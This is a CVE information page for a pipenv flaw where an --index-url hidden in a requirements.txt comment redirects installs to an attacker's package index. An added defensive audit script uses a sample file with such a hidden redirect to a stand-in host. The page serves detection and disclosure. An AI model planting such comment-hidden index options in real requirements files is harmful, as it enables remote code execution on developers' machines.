CVE-2022-21668 Information
Description
pipenv is a Python development workflow tool. Starting with version 2018.10.9 and prior to version 2022.1.8, a flaw in pipenv's parsing of requirements files allows an attacker to insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims' systems. If an attacker is able to hide a malicious --index-url option in a requirements file that a victim installs with pipenv, the attacker can embed arbitrary malicious code in packages served from their malicious index server that will be executed on the victim's host during installation (remote code execution/RCE). When pip installs from a source distribution, any code in setup.py is executed by the install process. This issue is patched in version 2022.1.8. The GitHub Security Advisory contains more information about this vulnerability.
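The flaw described above comes down to honouring index options that sit in the commented-out part of a requirements line. The following audit script is an added example (not pipenv's or pip's own code): it applies the comment rule pip uses (a '#' at line start or after whitespace) to split each line, then reports every index-redirecting option and whether it was hidden in the comment region, so a CI job can reject such a file before anything is installed. The sample requirements text and the example.invalid hosts are constructed for the demonstration.

```python
import re
from typing import Dict, List

# pip treats '#' as a comment marker only at line start or after whitespace.
COMMENT_RE = re.compile(r"(^|\s+)#.*$")
# pip options that change where packages are fetched from.
INDEX_OPTIONS = {"--index-url", "-i", "--extra-index-url", "--find-links", "-f", "--trusted-host"}

# Constructed sample: line 2 hides an index redirect inside a comment,
# line 3 sets one openly, line 4 is a fully commented-out line.
SAMPLE = """\
requests==2.25.1
flask==2.0.1  # pinned for compat --index-url https://pypi.example.invalid/simple
--extra-index-url https://mirror.example.invalid/simple
#-i https://other.example.invalid/simple
"""

def strip_comment(line: str) -> str:
    """Return only the part of a requirements line that pip actually parses."""
    return COMMENT_RE.sub("", line).strip()

def index_options_in(text: str) -> List[Dict[str, str]]:
    """Find index-affecting options in a token stream (both --opt=value and --opt value)."""
    found, tokens = [], text.split()
    for i, tok in enumerate(tokens):
        name, _, inline_val = tok.partition("=")
        if name in INDEX_OPTIONS:
            value = inline_val or (tokens[i + 1] if i + 1 < len(tokens) else "")
            found.append({"option": name, "value": value})
    return found

def audit_requirements(text: str) -> List[Dict]:
    """Report every index option and whether it sits in the comment region. A parser that
    tokenises the whole line would honour the in_comment=True entries; a correct one strips first."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        m = COMMENT_RE.search(raw)
        code_part = raw[:m.start()] if m else raw
        comment_body = m.group(0).lstrip()[1:] if m else ""  # text after the '#'
        for hit in index_options_in(code_part):
            findings.append({"line": lineno, "in_comment": False, **hit})
        for hit in index_options_in(comment_body):
            findings.append({"line": lineno, "in_comment": True, **hit})
    return findings

def hidden_index_options(text: str) -> List[Dict]:
    """The CI check: index options living inside comments are never legitimate."""
    return [f for f in audit_requirements(text) if f["in_comment"]]
```

Running `hidden_index_options(SAMPLE)` flags lines 2 and 4; the open `--extra-index-url` on line 3 is reported by `audit_requirements` with `in_comment` set to False, so a stricter policy can still reject it.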
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Reference
https://github.com/pypa/pipenv/releases/tag/v2022.1.8
https://github.com/pypa/pipenv/security/advisories/GHSA-qc9x-gjcv-465w
https://github.com/pypa/pipenv/commit/439782a8ae36c4762c88e43d5f0d8e563371b46f
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KCROBYHUS6DKQPCXBRPCZ5CDBNQTYAWT/
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QHQRIWKDP3SVJABAPEXBIQPKDI6UP7G4/
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/56HBA3EOSLEDNCCBJVHE6DO34P56EOUM/
Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: NONE
User Interaction Required: REQUIRED
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Base Score: 8.6
Base Severity: HIGH